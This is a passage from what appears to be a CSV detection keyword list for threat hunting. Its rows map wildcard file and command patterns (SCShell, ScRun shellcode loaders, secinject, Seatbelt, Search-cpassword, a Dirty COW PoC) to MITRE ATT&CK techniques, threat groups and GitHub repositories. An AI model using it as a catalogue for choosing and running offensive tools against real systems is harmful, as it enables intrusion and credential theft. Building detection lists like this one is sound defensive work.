T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*ScRunBase32.py*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*ScRunBase64.exe*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*ScRunBase64.py*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*scshell*XblAuthManager*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*SCShell.exe*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshell.py*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshellbof.c*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshellbof.o*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshellbofx64*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scumjr*dirtycow-vdso*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,1,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*search_for_secrets(*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*Search-cpassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*SearchOutlook.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*searchsploit -m *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*searchsploit -x *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*searchsploit_rc*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*seatbelt -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*seatbelt all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Seatbelt* -group=all*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a 
variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*Seatbelt.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*Seatbelt.exe*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*Seatbelt.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SeatbeltNet*.exe*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*secgroundzero*,offensive_tool_keyword,Github Username,github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/secgroundzero,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sec-inject *,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,0,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.cna*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 
- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.git*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.x64*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*secinject.x86*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
